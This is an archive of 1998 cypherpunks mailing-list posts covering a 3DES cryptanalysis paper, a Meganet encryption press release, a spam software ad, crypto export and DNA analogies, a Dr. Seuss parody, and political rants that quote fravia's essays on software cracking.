>not even know who you are, your privacy is safely intact." This is false,
>since they can access IP numbers of connection attempts.


I make a point of checking the individuals and companies involved in
various enterprises claiming to be the paranoid's best friend, as well
as checking their links and assorted tentacles.
The first thing I noticed about veil's anonymity site was that they don't
seem very proud of who they are and their company's background, since
they don't provide any information of that nature.
Combining that fact with the fact that they seem to be giving out 
blatantly false information regarding the anonymity of their users,
I would assume that their purpose is far from what they claim.

SpookMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Wed, 1 Apr 1998 06:23:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 3DES Weakness
In-Reply-To: <199804010054.QAA07423@comsec.com>
Message-ID: <199804011423.IAA16093@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


The NYT article is way overblown; the attack is only
against the particular mode in the standard and requires
something like 2^64 texts.  It's great work, but not a
very practical attack.

At 07:44 AM 3/31/98 -0500, John Young wrote:
>NYT-Markoff reports today on Biham and Knudsen's paper
>on 3DES weakness, "Cryptanalysis of the ANSI X9.52 
>CBCM Mode," noted here a few days ago.
>
>The ANSI X9.F1 committee has held up implementing its
>standard as a result, and may have to wait for AES. 
>Credit is given to the worldwide DES crack.
>
>   http://www.nytimes.com
>
>See a mirror:
>
>   http://jya.com/3des-weak.htm
>
>Get the Biham/Knudsen paper:
>
>  http://www.cs.technion.ac.il/%7Ebiham/publications.html
> 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis,MN  55419       Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Wed, 1 Apr 1998 12:23:47 -0800 (PST)
To: "CypherPunks" <cypherpunks@toad.com>
Subject: Practicing for 'saving' America?
Message-ID: <027901bd5dbc$8fcaa860$7679a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain



   They had bodies. Bodies of these men's brothers, crew members from the
helicopter or Delta soldiers, it was hard to tell from the angles and
distances of the camera shots. They were dragging a body through the street
at the end of a rope, kicking and poking at the lifeless form. It was ugly
and savage, and the men went back out to the hangar and cleaned their
weapons and waited for orders that would send them back out.

   Delta Sgt. Paul Howe was ready. If he was going back out, he was going to
kill as many Somalis as he could. He'd had enough. No more rules of
engagement, no more toeing some abstract moral line. He was going to cut a
gruesome path through these people.
http://www3.phillynews.com/packages/somalia/dec12/default12.asp

And what happens if we, as citizens, resist the assault of minimally trained
local and regional law enforcement agencies operating with massive firepower
donated to them by the federal government, and acting under the direction of
local government figures who have personal agendas and local political axes
to grind?
We have already seen the future of law enforcement in the travesties that
have already occurred in our cites and towns as a result of the mythical War
On Drugs. There is a remarkable parallel in our sending troops into both
Somolian and American cities to 'protect the people' from WarLords and
DrugLords. In both cases, the Lords die of old age while our self-proclaimed
protectors "cut a gruesome path" through the Peasants.

In the early 80's, as I watched the helicopters touch down in the
Ettersburg, California schoolyard and heavily armed men in camoflage piling
out in full view of the children, I had an uneasy feeling that what I was
observing went far beyond the stated objective of CAMP (Campaign Against
Marihuana Production).
After observing the armed assault against mostly happy-hippies living in the
hills for some period of time, I eventually realized that the true objective
of CAMP was to promote cooperation and interagency comradship between federa
l, state and local law enforcement groups.
The local yokel volunteers from various law enforcement agencies got to play
with the Big Boys, and with the Big Boys Toys, and use the cover of legality
to become fully immersed in the mentality needed for an unquestioning
assault on the populace.

Why pass better laws when you can just arm your enforcers with heavier
weaponry, instead?

Why provide true justice when you can just make everything a felony and
plead it down, instead?

Why bother telling 'good' lies when the Herdizens have become so numbed to
the lies and thievery of their rulers that 'bad' lies will suffice?

Why bother pretending that there will be jacuzzis waiting at the end of the
ride in the cattle-car when the Sheeple are passively being herded into them
by the strength of an established culture of oppression?

Why bother claiming that you 'only want Austria'...

~~~~
Toto  <toto@sk.sympatico.ca>
~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Wed, 1 Apr 1998 12:23:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 2nd announcement of ASIACRYPT'98
In-Reply-To: <199804011735.JAA08359@comsec.com>
Message-ID: <199804012023.OAA27291@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


>CONFERENCE VENUE
>
>The Conference venue will be Beijing Friendship Hotel, 
>the biggest garden style hotel in Asia with advanced 
>conference facilities and good service. Located in the 
>cultural and educational area, the Friendship Hotel is 
>adjacent to several top universities and research institutes, 
>which makes it more convenient for the conference 
>participants to have academic exchanges.

The Hotel was built as a residence for Russian "observers"
in Beijing.  It's quite nice, actually.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis,MN  55419       Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 17202106@05731.com
Date: Wed, 1 Apr 1998 17:39:52 -0800 (PST)
To: Friend@public.com
Subject: Web Promotion Spider
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


             Web Promote Spider

With well over 80 million documents on the web today,
getting your Site   noticed is a difficult process. Going to 
each Search Engine, Link Page,   Directory, and Newsgroup
to manually submit your page could realistically
take weeks to complete.

Announcing the  Web Promote Spider! Created specifically to
meet the needs of those who want their web pages to get
NOTICED and placed   in the TOP of the Search Engines!
The  Spider automates the   process of submitting your site
and uses powerful technology to get your site   listed in the 
TOP positions.

We've developed the  Web Promote Spider for Windows 95
and NT. This amazing program automatically submits your 
site to over 250   (the list grows daily) major search engines and
directories!

PLUS, the  Web Promote Spider has an Expert HTML Reader
system inside. It will change certain contents of your html text and
automatically prepare needed information for online registration 
in Search   Engines to Optimize your pages and get them listed
on TOP. Originally   engineered for use by the professional
advertising industry, this program is  easy and intuitive to use. 
Beginners will be amazed at how simple it is to take   complete
control over their search engines and index marketing efforts. 

The Web Promote Spider is an industrial strength marketing
tool and an extremely valuable part of any publicity campaign.
With this kind   of power, it should come as no surprise that 
many of our customers have even   built profitable on-line
promotional businesses with this product and their
existing Internet connection!

With your payment of only $49.95 (standard version) you will 
receive the  current Web Promotion Spider program. Also, you
can have all the new  upgrades FREE. Each upgrade will have
a list of new Internet Search  Engines/Online Directories and, 
of course, new features. 

Plus, you get free upgrades which come out twice a month
with new features   and new search engines. Register now 
and you'll continue to get our upgrades,   which keep the 
program up-to-date and getting better and better! Now
submitting to 250+ search engines, free.

We are proud to announce that we now have two powerful 
versions of the Web Promote Spider, our Standard Version 
and our brand new Pro Version. Our Standard Version is 
designed for those individuals who have one or two sites
that they want to be able to submit, and want to see dramatic 
increases in their sites visibility. Our Pro Version is designed
for ISP's, Webmasters,   Hosting Providers, and anyone who 
has multiple sites they need to promote   thoroughly. While the 
standard version does track all registration campaigns
for you, it can still be somewhat time intensive if you register 
several sites at   once, or on a regular basis.

You can see   why the Web Promote Spider is taking the Net
 by storm!

Professional Version

While the standard version of this product seems to meet the 
promotional needs of most of our customers, we also recognize
the need for an 'industrial strength' version of  Web Promote Spider.

The Professional Version is designed for ISP's, Webmasters,
Hosting Providers, and anyone who has multiple sites they need
to promote thoroughly. While the standard version tracks all registration
campaigns for you, it can still be time intensive if you have to register
several sites at once.

To make this easier and more efficient for our customers, we have
added several new features to the brand new Professional Version:

Deep Promotion - This feature will automatically explore every
internal link in your site, and develop registration information for 
each page for you automatically. For instance, in the standard
version, if you have a 30 page site, you would have to run  Web 
Promote Spider thirty times, manually inputting each page into 
the registration queue. In the professional version, this is
all automatic, and can be done in a matter of minutes.

Batch Processing - If you are responsible for registering or 
maintaining several sites, you will find this feature particularly 
useful. You can load in multiple sites, and set the program to
run all the sites at once, generating and saving a separate
registration report on each. This report can easily be copied 
to the Windows clipboard for pasting into reports, email, etc.
Expanded Promotion Resources - While the standard version
of the Spider will submit to 250 registration resources this list
will continue to grow but not as quickly as what's being planned
on the professional version. The Pro Version currently has 400
and will soon have at least 1,000 automatic registration 
options/resources.

If you're a previous owner of the Standard Version, the cost is
only $49.95 to upgrade! If you're a first time user and would like
to start using the Pro Version right away, the cost is $99.90.

                                To Order

Order by fax or mail  Visa or Mastercard

Fax: (425) 379-9722
Mail to: SYS
              11014 19th Ave SE Suite 305
               Everett, WA 98208

We will give you the address to download the program
or for an extra $10.00 we'll send your the program
on CD-Rom

Name:_______________________

Address:_____________________

City:________________

State:________________

Zip:________________

Home Phone:___________________

Work Phone:____________________

Fax:____________________

E-mail_________________

__Standard Version $49.95

__Pro Version   $99.90

__Upgrade $49.95 (From Standard to Pro, if you already 
                                   have the standard version)

___Send CD-Rom $10.00

___Provide download address..No Charge

_____Total

Visa___MasterCard____

Account number:_______________

Expiration Date:________________

I understand that all sales are final.

_______________________
     Signature

---------------------------------------------------------------------------

















   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dmitry Goldgaber <dgoldgaber@mail.psychiatry.sunysb.edu>
Date: Wed, 1 Apr 1998 13:55:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cryptography and DNA
Message-ID: <35227461.6C61@mail.psychiatry.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Chaffing and winnowing in molecular biology"
Ronald L. Rivest's method for hiding information by breaking it in to 
packets mixed with other meaningless packets is similar to an approach
which is used in organic systems, at the DNA level.

In our bodies, packets of meaningful information from the DNA used for 
encoding protein sequences, called exons, are mixed with meaningless
stretches of DNA, called introns.  Certain rules exist for putting
protein coding sequences together which are based on information around
the
intron/exon border.

The analogy between cryptographic techniques and biological
processes at the genetic level are striking.  I believe that principles
of protien coding may be useful to the cryptographic community.  In
turn,
the principles and methods used by the cryptographic community may
be useful to those who are analysing DNA sequences which are available
and
are becoming available from the Human Genome Project and other non-human
Genome projects.

Dmitry Goldgaber




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Wed, 1 Apr 1998 15:47:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Clinton's enemy files
Message-ID: <6c26f0c8.3522d1e2@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-04-01 18:41:52 EST, "nobody" writes:

<< @TEXT 	RNC Chairman Blasts White House for Maintaining 'Enemies Files' ...
>>

And if you (or 'nobody' ;-) ) believes anything that the RNC says, you'll also
believe that Jones had a case.  Ha!

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 1 Apr 1998 17:24:20 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Meganet Corporation Ships Virtual Matrix Encryption Nationwide; new $1.2 Million Challenge Begins Today
Message-ID: <199804020123.TAA05405@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


_I_ am not joking on this April Fools' day.

I picked it up from a stock website.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Wednesday April 1, 11:00 am Eastern Time

Company Press Release

SOURCE: Meganet Corporation

Meganet Corporation Ships Virtual Matrix Encryption Nationwide; New $1.2
Million Challenge Begins Today

LOS ANGELES, April 1 /PRNewswire/ -- Meganet Corporation, who challenged
Microsoft (Nasdaq: MSFT - news), Intel (Nasdaq: INTC - news), Dell
(Nasdaq: DELL - news), AT&T (NYSE: T - news), NCR (NYSE: NCR - news)
and many other high tech companies with their unbreakable encryption
is shipping VME98 nationwide. As of today, April 1st, 1998, anyone in
the continental United States of America can buy VME98 directly from
the Meganet web site at http://www.meganet.com. Prices for the standard
edition are only $100 for a fully operational application.

After 12 months of Research & Development, Meganet Corporation completed
21 different commercial versions of VME98 last month, and the product
is now being sold nationwide through the World Wide Web.

Virtual Matrix Encryption is the strongest encryption available today,
and the product is available ONLY in the United States of America. For
the time being, there are no sales in any other countries, though Meganet
Corporation is considering applying for an export license.

Meganet Corporation also keeps on working on standardizing VME with the
different standards committees.

Meganet Corporation is also launching their 3rd challenge which is worth
$1.2 million over the next 12 months. Starting today, and for the next 12
months, Meganet Corporation will post a monthly $100,000 challenge for
registered users of VME98. This new challenge shows Meganet Corporation
has absolute confidence that VME98 is completely unbreakable.

Today's date also marks 1 year from the first 1 million dollar challenge
that brought Meganet Corporation nationwide recognition. The challenge
lasted 45 days and over 55,000 people participated. None have succeeded.

Today also marks the end of the second challenge which lasted over 6
months, where Meganet Corporation challenged the top 250 corporations
in the U.S. to test and break VME97. None have succeeded. The challenge
solution will be posted on the Meganet web site at http://www.meganet.com.

Meganet Corporation has a U.S. patent pending for VME. The technology
uses a new field of encryption and a new algorithm to encrypt data
that is completely different from any existing method. VME is the only
algorithm that does not encrypt the data or transfer it. By comparing
the data to a random built-in Virtual Matrix, a system of pointers
is being created. These pointers are meaningless outside the context
of the matrix they belong to, while being repeatedly encrypted in a
plethora of algorithms. Even in the unlikely event that the algorithms
are compromised, the set of pointers discovered is completely unrelated
to the original data, and there is no way to derive the original data out
of the pointers set. The Virtual Matrix encryption enables the world's
first and only unbreakable encryption.

More information about Meganet Corporation and the Virtual Matrix
Encryption can be found at http://www.meganet.com.

SOURCE: Meganet Corporation

 More Quotes and News:
                   AT&T Corp (NYSE:T - news) Dell Computer Corp
                   (Nasdaq:DELL - news) Intel Corp (Nasdaq:INTC - news)
                   Microsoft Corp (Nasdaq:MSFT - news) NCR Corp (NYSE:NCR
                   - news)
 Related News Categories: ISDEX, computer hardware, computers, internet,
 semiconductors, software, telecom, telecom



                                            Hel

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sphantom <shadow@tfs.net>
Date: Wed, 1 Apr 1998 19:52:18 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: [Fwd: This is  a neat one]
Message-ID: <35230B70.E697B084@tfs.net>
MIME-Version: 1.0
Content-Type: text/plain



sphantom wrote:

> What if Dr.Seuss Wrote Technical Training Manuals?
>
> >>>>>>>>>>>>COMPUTER MANUAL by Dr. Seuss<<<<<<<<<<<<<<
>                              With Apologies to Dr. Seuss
>
> If a packet hits a pocket on a socket on a port,
> And the bus is interrupted as a very last resort,
> And the address of the memory makes your floppy disk abort,
> Then the socket packet pocket has an error to report!
>
> If your cursor finds a menu  item followed by a dash,
> And the double-clicking icon puts your window in the trash,
> And your data is corrupted 'cause the index doesn't hash,
> Then your situation's hopeless, and your systems gonna crash!
>
> You can't say this? What a shame sir!
> We'll find you another game sir!
>
> If the label on the cable on  the table at your house,
> Says the network is connected to the button on your mouse,
> But your packets want to tunnel on another protocol,
> That's repeatedly rejected by the printer down the hall!
>
> If your screen is all distorted by the side-effects of gauss,
> So your icons in the window are as wavy as a souse,
> Then you may as well reboot, and go out with a bang,
> 'Cause as sure as I'm a poet, the sucker's gonna hang!
>
> If the copy of your floppy's getting sloppy on the disc,
> And the microcode instructions cause unnecessary RISC,
> Then you have to flash your memory, and you'll want to RAM your ROM,
> Quickly turn off the computer and be sure to tell your MOM!




To: the flowers <cflowers@sjsd.k12.mo.us>
Subject: This is  a neat one
From: sphantom <shadow@tfs.net>
Date: Wed, 01 Apr 1998 21:44:38 -0600
CC: JP <jp1@journey.com>, Jason Price <jprice@ponyexpress.net>
Organization: Beware of phantoms who hide in shadows...
Reply-To: shadow@tfs.net

What if Dr.Seuss Wrote Technical Training Manuals?

>>>>>>>>>>>>COMPUTER MANUAL by Dr. Seuss<<<<<<<<<<<<<<
                             With Apologies to Dr. Seuss

If a packet hits a pocket on a socket on a port,
And the bus is interrupted as a very last resort,
And the address of the memory makes your floppy disk abort,
Then the socket packet pocket has an error to report!

If your cursor finds a menu  item followed by a dash,
And the double-clicking icon puts your window in the trash,
And your data is corrupted 'cause the index doesn't hash,
Then your situation's hopeless, and your systems gonna crash!

You can't say this? What a shame sir!
We'll find you another game sir!

If the label on the cable on  the table at your house,
Says the network is connected to the button on your mouse,
But your packets want to tunnel on another protocol,
That's repeatedly rejected by the printer down the hall!

If your screen is all distorted by the side-effects of gauss,
So your icons in the window are as wavy as a souse,
Then you may as well reboot, and go out with a bang,
'Cause as sure as I'm a poet, the sucker's gonna hang!

If the copy of your floppy's getting sloppy on the disc,
And the microcode instructions cause unnecessary RISC,
Then you have to flash your memory, and you'll want to RAM your ROM,
Quickly turn off the computer and be sure to tell your MOM!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 1 Apr 1998 23:32:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: illegal export of pgp.zip by .mil
Message-ID: <3.0.5.32.19980401233224.007aacd0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


	
http://braggbbs.bragg.army.mil/libs/utils.htm
has a link to ftp://bbs.bragg.army.mil/library/utils/pgp262.zip

Someone (from Europe, ideally) should clue these people
in.  Maybe cc the media.  






honig@alum.mit.edu
------------------
"Are we going after their tax returns?  I can only hope that we are,
frankly, doing a little persecuting" ---Nixon to Erlichman,
on tax audits of wealth Jewish contributors to the Democrats.
	-LA Times 1.4.98






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 2 Apr 1998 01:52:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Reno and Freeh talking about Crypto and Terrorism
Message-ID: <199804020935.BAA10288@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


"A balanced solution between the interests of
the public and the interests of law enforcement."

- THE LIE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Thu, 2 Apr 1998 04:08:49 -0800 (PST)
To: "CypherPunks" <cypherpunks@toad.com>
Subject: Prologue 16/0 - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <000e01bd5e40$8bfbe120$1862a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain



Title: Prologue 16/0 - SPACE ALIENS HIDE MY DRUGS




Prologue 16/0 - SPACE ALIENS HIDE MY DRUGS!!!

First of all, let me stress the importance of cracking in our everyday life. Cracking it's not just about software, it's about information, about all patterns of life. To crack is to refuse to be controlled and used by others, to crack is to be free. But you must also be yourself free from petty conventions in order to crack properly. 
You must learn to discern cracking possibilities all around yourself, and believe me, the development of this ghastly society brings every day new codes, protections and concealing mechanisms. All around us grows a world of codes and secret and not so secret patterns. Codes that are at times so familiar and common that we do not even notice them any more... and yet they are there to fool us, and yet they offer marvelous cracking possibilities.
http://fravia.org/crack_C1.htm
 
From: Dmitry Goldgaber dgoldgaber@mail.psychiatry.sunysb.edu
To: cypherpunks@toad.com cypherpunks@toad.com
Subject: Cryptography and DNA
"Chaffing and winnowing in molecular biology"
Ronald L. Rivest's method for hiding information by breaking it in to packets mixed with other meaningless packets is similar to an approach which is used in organic systems, at the DNA level.
In our bodies, packets of meaningful information from the DNA used for encoding protein sequences, called exons, are mixed with meaningless stretches of DNA, called introns. Certain rules exist for putting protein coding sequences together which are based on information around the intron/exon border.
The analogy between cryptographic techniques and biological processes at the genetic level are striking. I believe that principles of protein coding may be useful to the cryptographic community. In turn, the principles and methods used by the cryptographic community maybe useful to those who are analyzing DNA sequences which are available and are becoming available from the Human Genome Project and other non-human Genome projects.
Dmitry Goldgaber
dgoldgaber@mail.psychiatry.sunysb.edu

  
...only one remark, may be: the DOS/UNIX world seems very neglected in the essays... everybody is cracking exclusively the newest applications for windoze, and that could be a mistake: 
I said that we must crack windoze in order to throw our seeds with the wind, true, but let's not forget that, as you know very well, a good knowledge of the past is the only tool you can relay on in order to foresee the future...
...You see fravia+, for the first time in the history of humanity knowledge can be spread for free and reach anybody who cares :=) 
I don't know if this contingency will last, coz many powerful forces are struggling against this. Should knowledge, their efforts notwithstanding, continue to flow in this way, it will change the face of the world as we know it.
http://fravia.org/academy.htm
 
 
Now, Bubba explained, the Evil Forces were regrouping to once again take control of the world, and they had been working through our new, hi-tech gods, the Gods of Communication--television and computers. 
"There were those who tried to warn us," he said. "Marshal McLuhan was our hi-tech 'John the Baptist,' "The Medium Is The Message" became our new Bible, but he, too, was just a "voice crying in the wilderness." "Others, like the "Android Sisters," we relegated to the status of clowns and entertainers as the 'Media' lulled us to sleep and became our 'Waking Dream,' our new reality." 
"Where once we sacrificed sheep, offering up the blood of the innocent to appease our gods," Bubba railed, with ever mounting conviction, "now we have become the sheep to be led to the slaughter by our 'Gods of Communication.' 
"And the shadow of Gomez falls ever more frequently across our door, like a pestilence upon the land and its people."
Bubba Rom Dos, derelict and philosopher, surveyed the crowd, which had now gone totally silent, and proceeded to explain some of the things he claimed to have learned in the Far East from a group which was, according to him, actively working to counter the new 'Angels of Darkness' which had already begun launching their assault upon mankind, using our own new hi-tech environment. 
"Demons," he explained, "have always worked their will through our own physical reality in order to accomplish their ends. Television has lulled our minds into a deep slumber, and now they are free to attack through the mechanisms of the physical instrument which is becoming a part of, and controlling force over, the whole of our lives---the computer." 
"Our lives are tracked and controlled by numbers---our address, our phone number, our social security number, our driver's license and passport numbers. And now all these numbers are being controlled by computers---computers that can communicate all around the world, at the touch of a button. Computers that can, in an instant, separate us into categories according to our names, our race, our political beliefs, or by the names of our children. Computers that know all, and see all." 
Bubba explained how the Evil One is making his bid, once again, to write his own happy ending in the Final Chapter of the war between the 'forces of good and evil.' He told of how Gomez and the Dark Allies (Daemons, Zombies, and Orphan Zombies) have been unleashed to wreak their havoc in the Final Battle, with the Hounds of Hell nipping at our heels and the dreaded Cron orchestrating this whole savage 'Dance of Armageddon.' 
By now the crowd had grown deathly silent and Bubba, sensing that they were, individually and collectively, on the edge of despair, began talking about what could be done to alleviate, and perhaps even remedy, the present desperate situation. 
He explained that the reason that many of the best computer hackers around were teenagers was that they are in the hot, throbbing throes of puberty, and were thus very conscious of the yin-yang aspects of computers, which basically consist of just hardware and software. The hardware, he said, is the yang, or male aspect, of computers, while the software is the yin, or female, component. 
"Hardware is very ego-centered, it wants everything it's own way. In order to operate correctly, it wants everything to be very structured, in the place it wants it to be in, and meeting its own narrow criterion. When you turn the hardware on it gives itself a little diagnostic 'hitch in the crotch' to check its equipment, and says, 'let's get at it'---it's ready for some action." 
"Software is more flexible and malleable. It is more willing to go with the flow and change to meet the requirements for the job at hand, rather than forcing things to be done in a certain way. Good software will do anything you want it to do---it just wants to be coaxed with the right words and syntax, so that you don't think of it as being too 'easy.' 
Bubba explained that programmers are what Gurdjieff referred to as the 'third,' or 'unifying,' force in the universe, capable of bringing the yin and yang aspects of the cosmos into union with one another to produce a third, unique force. 
"Programmers are the unifying force that supply the energy enabling two separate and unique components, hardware and software, to have a relationship that is capable of productivity and growth. A marriage of matter that could spawn and produce a multitude of children to go forth and do many new things in the world, for better or worse, for good or for evil." 
"You are society's last hope for thwarting the Forces of Evil gearing up for the final battle, readying themselves to wreak grievous havoc upon the world, such that it has never known. It is up to you to 'raise the torch,' and let the 'light of knowledge' spread throughout the civilized world, in the thread of 'clues' scattered throughout the UNIX operating system, and throughout your programming and your instructions." 
"You must band together, man and woman, young and old, into a 'Magic Circle' for your own protection from the Forces of Darkness! You must develop your own secret codes and rituals to deal with the Evil Forces which will beset you daily once you set foot on the Path of Righteousness."
At this point Bubba, who had been sucking rather liberally on a bottle of Wild Turkey during this rousing and inspiring 'spiritual soliloquy,' started to lose his train of thought and began to babble randomly about young boys' hardware and young girls' software, making statements that downright smacked of pedophilia, and it turned into quite a nasty scene before the students finally threw him out of the meeting. 
But a spark had been ignited before the old geezer finally lost control of his mind, as well as some of his bodily functions, and the evening marked the initial development of the 'Post-Ancient Rites' of the Computer Age---and the beginning of an underground Secret Society later to become known by those within the 'Magic Circle' as the "Circle of Eunuchs." 
http://www.clas.net/~dave/public/xenix
 
We are already now thoroughly involved in this, and your "students' essays" page is a very good example of a potential new dawn. We will see in due time... let us sip our cocktails and wait... as I told you, the repercussions, on the web never immediate, yet the inertial effects of our work can be huge.
Thank to your (and other) sites, those who want to learn will now be able to begin learning (and teaching, which is the other side of the same extraordinary mirror) within very powerful frames.
It was about time: maiora premunt! 
The world of the near future will be a "world of software", an half-virtual world, where code will assume today unbelievable massive proportions, where" reality" will not count much for the pavlovian gullible beings that will forget their miserable slave conditions deafened by the concerted (and concocted) "virtuality" that they will Oh so much love.
A world of software, a world of code, and therefore, as usual, a world of hidden codes and hidden meanings (as if the world we live in now did not have already enough of them :=(
I just hope that many of our "students" will soon tackle the more complex and even less rewarding task of cracking the reality they live in... hoc opus, hic labor: software protections are only a tiny part of the "unknown" world around us, albeit a very useful playground to flex your "reversing muscles".
Our students and friends will have the difficult (and seldom rewarding) task of finding the keys of its concealed doors, in order to donate them to all those who care, to all those that our enemies are determined to leave outside. In fact they "must" remain out in order to allow fat profits for a minority. This future codeworld will be a scary world indeed if we don't modify (or destroy) the rails our societies are now running on:
I advice you to fasten your seat belt and to seat next to an emergency exit.
Like cracking.
Work well, +ORC
http://fravia.org/academy.htm
 
 
Shackling the state *
by Nuri Albala
If signed, the current MAI proposals would form a benchmark for the global investment economy, taking precedence over most existing national obligations and agreements. The multinational corporations would be given powerful ammunition against sovereign states and the legal means to enforce their new "rights". It is a dynamic agreement which would ultimately "rollback" all national laws which did not conform. 
Translated by Julie Stoker
http://www.monde-diplomatique.fr/md/en/ 
 
 
The infamous "privatization" and "rationalization" trend of the last decades, basically aimed to degrade the quality of life in the whole world in order to allow more profits for the few that had the economic power, among many other damages, wiped away the "conductors" all over the world. 
A society where the cloak of rationalization is used only to blind people, tricking them into losing life quality and into political immobility through a well orchestrated propaganda machine in order, as always, to allow very few to make a lot of profit... 
Yes, as I have repeatedly told you: quality of life has been continuously and purposely lowered, in order to allow bigger profits for the few that control this awful society of stupid slaves: planes land noisy at night, whole suburbs abandoned to the savages, you have to carry heavy water home and your pensions (should you have the right to a pension) will be cut (or completely eliminated) in the near future in name of the "rationalization". In the mean time all social cushions are being stripped off one by one, in name of the "globalization" and of the "free play" of the market forces, which are nothing else than the uncontrollable throbbing for profits of the few that control these markets.
Don't be deceived if there is nothing about cracking code above... decoding life is much more important than decoding code, and you won't be able to feel the code if you don't learn first to decode the world around you.
A devastated, scorched society, that's where we live in, a desert of intelligence where only some faint lights glow. Make so that your brain will help others to find the way to understand the world around them with unsullied eyes, that's the real task of a cracker.
Moreover inside each country (rich and poor alike) takes place an analogous "development" in favor of the richest part of the population... that's the current "progress of humanity" stand behind all bla-bla-bla: rich get richer, poor get poorer... a nice society indeed, headed at full speed against a brick wall.
Because we are more than code crackers: we are reality crackers, my kids.
+ORC, the old red cracker, August 1997
http://fravia.org/modernze.htm
 
Requiem for a Fallen Comrade:
One of the original members of the Circle of Eunuchs recently began analyzing information gleaned from an AI Model designed to enable herself and others to calculate the variation between the economic gains provided by the evolution of technology and the reflection of these gains in the economic evolution of society, as a whole.
The AI Model was designed and generated using techniques and methodologies which have already proved to provide exemplary results in regard to reflecting real-world results, as reflected by analysis and direct observation.
Her preliminary report, based on what she considered to be a solid--though incomplete--foundation, was that there appeared to be an astounding amount of wealth generated by evolving applied technology which was disappearing down a "Black Hole."
Shortly after providing her preliminary report, she, also, "disappeared down a Black hole," as did her equipment and all record of her work on the project, code-named 'Robyn Steele.'
Permanent residents of TVWorld are unlikely to notice her absence, but those who strive to live their life in a waking state are well aware that there is a star missing in the sky over Lost Alamo that brought much sparkle and joy to those who dare to venture out into the darkness to help others find their way to the light.
http://dev.null/Alexis.htm
 
 
The Revolution is NOW!
http://www.clas.net/~dave/public/infowar3
 
 
People do not want to learn to be free, and to free them we have sadly to "circumvent" them with more or less the same techniques that our enemies use to enslave them :=)
Let's crack the very temples of the enemies of the humanity and poetry, the prisons where we are forced to buy and consume... let's show all idiots the WHIPS that are used to enslave them... as always light comes through knowledge.
Remember that NOTHING is casual in this awful society where people are CULTIVATED to consume and nothing else than that. Around you almost everything has a "secret" meaning, that you are not supposed to see, understand or crack 
So let's battle against them! Codebar! Understand! Explain others! Free the stupid slaves... watch the world around you free from petty convention and understand in what for an awful mess you are condemned to live! 
http://fravia.org/slaves.htm
 
 
Prologue to 'WebWorld & The Mythical Circle of Eunuchs'

The great tragedy of it, is that it didn't have to happen. Not at all...we were warned.
And yet, still, it has come to this. 
I don't know why I feel this overwhelming compulsion to go on and on about it. I could have done something. We all could have done something.
Perhaps the final epitaph on the gravestone of Freedom will be, 
"Why didn't somebody 'do' something?" 
That seems to be the common battle-cry of the legions of humanity that have been sucked into the vortex of the New World Order.
None of the imprisoned seem to know that the very phrase itself is reflective of the source of their imprisonment...that this desperate cry of anguish is in no way an antidote for the terrible disease that has afflicted 'Liberty and Justice', and that it is, rather, merely the final symptom of the cursed blight itself. 
I can hear the rumbling of the trucks as they come up the street, and soon I will be hearing the thumping of the jackboots storming up the staircase, as I have heard them so many times before. But I suspect that this time, the sound will be different, that it will have an ethereal quality about it, one which conveys greater personal meaning than it did when I heard it on previous occasions.
This time, they are coming for 'me.'
My only hope is that I can find the strength of character somewhere inside myself to ask the question which lies at the heart of why there is a 'they' to come for me at all...why, in the end, it has finally come to this for me, as for countless others. 
The question is, in retrospect, as simple and basic as it is essential for any who still espouse the concepts of freedom and liberty to ask themselves upon finding themselves marveling at the outrageousness being perpetrated upon their neighbors by 'them'...by 'others'...by 'Friends of the Destroyer.' 
The question is:
"Why didn't 'I' do something?"
http://www.clas.net/~dave/public/webworld
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VeriSign Customer Service <id-center@verisign.com>
Date: Thu, 2 Apr 1998 06:13:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Secure your E-mail with your Digital ID
